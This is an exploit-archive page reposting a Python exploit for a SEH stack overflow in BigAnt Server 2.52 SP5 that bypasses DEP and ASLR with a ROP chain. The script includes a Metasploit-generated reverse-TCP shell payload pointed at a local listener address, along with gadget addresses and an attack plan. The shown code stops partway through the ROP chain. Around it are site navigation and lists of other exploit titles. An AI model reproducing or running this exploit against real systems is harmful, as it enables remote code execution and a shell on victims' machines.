首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BigAnt Server 2.52 Stack Overflow
来源:vfocus.net 作者:Cantoni 发布时间:2012-11-07  
# Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)
# Date: 03/11/2012
# Exploit Author: Lorenzo Cantoni
# Vendor Homepage: http://www.bigantsoft.com/
# Version: BigAnt Console 2.52 SP5
# Tested on: Windows 7 SP0 x86 Italian - expsrv.dll (6.0.9589)
# Info: Vulnerability discovered by Lincoln: http://www.securityfocus.com/bid/37520/info
 
 
import socket
import sys
 
################
#Attack plan
#1) Overwrite SEH handler with a ROP Gadget that will move the stack pointer inside our buffer and continue the execution from there (ADD ESP,something + RETN should be ok)
#2) Execute the ROP Chain for a VirtualAlloc() and PUSHAD
#3) Run the shellcode
#4) Have fun :)
################
 
 
# Memory Layout
 
################
#
# Padding
#
################
#
# ROP-NOP Sled
#
################
#
# ROP Chain
#
################
#
# Padding
#
################
#
# NOP SLED
#
################
#
# Shellcode
#
################
#
# Padding
#
################
#
# SEH Overwite (Stack Pivot)
#
################
#
# Padding (may be useful for other shellcode?)
#
################
 
 
 
#From the original exploit, SEH will be overwritten after 966 bytes
 
target_address=sys.argv[1]
target_port=6660
 
#./msfpayload windows/shell/reverse_tcp EXITFUNC=thread LHOST=192.168.1.5 LPORT=4444 R | ./msfencode -a x86 -b "\x00\x0a\x0d\x20\x25" -t c
# size 317
shellcode = ("\xb8\xc0\xd7\xb6\x97\xdb\xd2\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x49\x31\x45\x14\x03\x45\x14\x83\xc5\x04\x22\x22\x4a\x7f\x2b"
"\xcd\xb3\x80\x4b\x47\x56\xb1\x59\x33\x12\xe0\x6d\x37\x76\x09"
"\x06\x15\x63\x9a\x6a\xb2\x84\x2b\xc0\xe4\xab\xac\xe5\x28\x67"
"\x6e\x64\xd5\x7a\xa3\x46\xe4\xb4\xb6\x87\x21\xa8\x39\xd5\xfa"
"\xa6\xe8\xc9\x8f\xfb\x30\xe8\x5f\x70\x08\x92\xda\x47\xfd\x28"
"\xe4\x97\xae\x27\xae\x0f\xc4\x6f\x0f\x31\x09\x6c\x73\x78\x26"
"\x46\x07\x7b\xee\x97\xe8\x4d\xce\x7b\xd7\x61\xc3\x82\x1f\x45"
"\x3c\xf1\x6b\xb5\xc1\x01\xa8\xc7\x1d\x84\x2d\x6f\xd5\x3e\x96"
"\x91\x3a\xd8\x5d\x9d\xf7\xaf\x3a\x82\x06\x7c\x31\xbe\x83\x83"
"\x96\x36\xd7\xa7\x32\x12\x83\xc6\x63\xfe\x62\xf7\x74\xa6\xdb"
"\x5d\xfe\x45\x0f\xe7\x5d\x02\xfc\xd5\x5d\xd2\x6a\x6e\x2d\xe0"
"\x35\xc4\xb9\x48\xbd\xc2\x3e\xae\x94\xb2\xd1\x51\x17\xc2\xf8"
"\x95\x43\x92\x92\x3c\xec\x79\x63\xc0\x39\x2d\x33\x6e\x92\x8d"
"\xe3\xce\x42\x65\xee\xc0\xbd\x95\x11\x0b\xd6\x3f\xeb\xdc\x19"
"\x17\xf2\x19\xf2\x65\xf5\x30\x5e\xe0\x13\x58\x4e\xa4\x8c\xf5"
"\xf7\xed\x47\x67\xf7\x38\x22\xa7\x73\xce\xd2\x66\x74\xbb\xc0"
"\x1f\x74\xf6\xbb\xb6\x8b\x2d\xd1\x36\x1e\xc9\x70\x60\xb6\xd3"
"\xa5\x46\x19\x2c\x80\xdc\x90\xb8\x6b\x8b\xdc\x2c\x6c\x4b\x8b"
"\x26\x6c\x23\x6b\x12\x3f\x56\x74\x8f\x53\xcb\xe1\x2f\x02\xbf"
"\xa2\x47\xa8\xe6\x85\xc8\x53\xcd\x17\x35\x82\x28\x92\x4f\xa0"
"\x58\x5e")
 
 
#  ROP Chain target
#
#            EAX = NOP (0x90909090)
#            ECX = flProtect (0x40)
#            EDX = flAllocationType (0x1000)
#            EBX = dwSize (0x1)
#            ESP = lpAddress (automatic)
#            EBP = ReturnTo (ptr to jmp esp)
#            ESI = ptr to VirtualAlloc()
#            EDI = ROP NOP (RETN)
 
# we will ROP inside VBAJET32.DLL which is proprietary and an OS DLL, C:\Windows\system32\expsrv.dll
 
 
# ADJUST EDX AND EDI
ropchain = ''
for i in range(0,16): ropchain = ropchain + '\xc5\x86\x9e\x0f' #ADD EAX 100 - RETN  # REPEAT 16 TIMES
ropchain = ropchain + '\x3c\xe4\x9e\x0f' # The next gadget point to the following
#0F9EE43C   8BD0             MOV EDX,EAX
#0F9EE43E   8D41 08          LEA EAX,DWORD PTR DS:[ECX+8]
#0F9EE441   C1E0 04          SHL EAX,4
#0F9EE444   2BC2             SUB EAX,EDX
#0F9EE446   5F               POP EDI
#0F9EE447   5E               POP ESI
#0F9EE448   5D               POP EBP
#0F9EE449   5B               POP EBX
#0F9EE44A   C3               RETN
 
# According to my  registers values, at pivoting time ECX+8 should point to a valid memory location so we go on
 
ropchain = ropchain + '\x9f\x18\x9a\x0f' # RETN POPPED IN EDI (ROP-NOP)
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP ESI
ropchain = ropchain + '\x41\x41\x41\x41' # compensation for POP EBP
ropchain = ropchain + '\xff\xff\xff\xff' # will be popped in EBX (and incremented later)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WinRM VBS Remote Code Executio
·GOM Video Converter Buffer Ove
·EMC Networker Format String
·LibreOffice Suite 3.5.5.3 Deni
·Invision Power Board 3.3.4 Uns
·KMPlayer v3.3.0.33 Multiple Vu
·Microsoft Office Excel 2007 Wr
·Zoner Photo Studio 15 Buffer O
·BigAnt Server 2.52 SP5 SEH Sta
·Microsoft Office Excel 2013 me
·HP Intelligent Management Cent
·Microsoft Publisher 2013 memor
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved